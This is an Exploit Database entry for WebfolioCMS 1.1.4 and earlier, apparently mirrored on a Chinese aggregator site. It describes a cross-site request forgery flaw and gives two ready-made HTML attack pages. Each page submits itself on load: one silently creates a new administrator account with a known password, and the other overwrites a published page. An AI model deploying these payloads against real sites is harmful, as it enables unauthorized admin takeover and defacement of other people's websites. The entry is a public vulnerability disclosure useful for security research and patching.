WebfolioCMS 1.1.4 – Cross-Site Request Forgery (Add Admin/Modify Pages)

• Exploit Database
• 128 阅读

• 作者： Ivano Binetti
  日期： 2012-02-28
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/18536/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63

  +--------------------------------------------------------------------------------------------------------------------------------+ # Exploit Title: WebfolioCMS <= 1.1.4 CSRF (Add Admin/Modify Pages) # Date : 28-02-2012 # Author : Ivano Binetti (http://ivanobinetti.com) # Software link: http://sourceforge.net/projects/webfolio-cms/files/WebfolioCMS-1.1.4.zip/download # Vendor site: http://webfolio-cms.sourceforge.net/ # Version: 1.1.4 and lower # Tested on: Debian Squeeze (6.0) # Original Advisory: http://ivanobinetti.blogspot.com/2012/02/webfoliocms-114-csrf-add-adminmodify.html +--------------------------------------------------------------------------------------------------------------------------------+ +------------------------------------------[CSRF Vulnerabilities by Ivano Binetti]-----------------------------------------------+   Summary 1)Introduction 2)Vulnerabilities Description 3)Exploit 3.1 Add Administrator 3.2 Modify Web Page +--------------------------------------------------------------------------------------------------------------------------------+ 1)Introduction Webfolio CMS "is a free, open-source, customized content management system, whose main purpose is creation of web sites for presenting someone&apos;s work, and portfolio-like websites".   2)Vulnerabilities Description WebfolioCMS 1.1.4 (and lower) is affected by a CSRF Vulnerability which allows an attacker to add a new administrator, modify a web pages, and change may any other WebfolioCMS&apos;s parameter. In this document I will demonstrate how to add an administrator account and how to modify an existing and published web pages. other parameters can be modified with little changes.   3)Exploit 3.1 Add Administrator <html> <body onload="javascript:document.forms[0].submit()"> <H2>CSRF Exploit to add ADMIN account</H2> <form method="POST" name="form0" action="http://<webfolio_ip>:80/admin/users/add "> <input type="hidden" name="user[username]" value="new_admin"/> <input type="hidden" name="user[email]" value="admin@admin.com"/> <input type="hidden" name="user_meta[firstName]" value="admin_firstname"/> <input type="hidden" name="user_meta[lastName]" value="admin_lastname"/> <input type="hidden" name="user[password]" value="password"/> <input type="hidden" name="re_password" value="password"/> <input type="hidden" name="user[groupId]" value="1"/> <input type="hidden" name="add" value="Add"/> </form> </body> </html>     3.2 Modify Web Page <html> <body onload="javascript:document.forms[0].submit()"> <H2>CSRF Exploit to Modify published web page</H2> <form method="POST" name="form0" action="http://<webfolio_ip>:80/admin/pages/edit/web_page_name"> <input type="hidden" name="title" value="new_title"/> <input type="hidden" name="text" value="new_text"/> <input type="hidden" name="id" value="1"/> <input type="hidden" name="titleUrlFormat" value="test"/> <input type="hidden" name="save" value="Save"/> </form> </body> </html> +--------------------------------------------------------------------------------------------------------------------------------+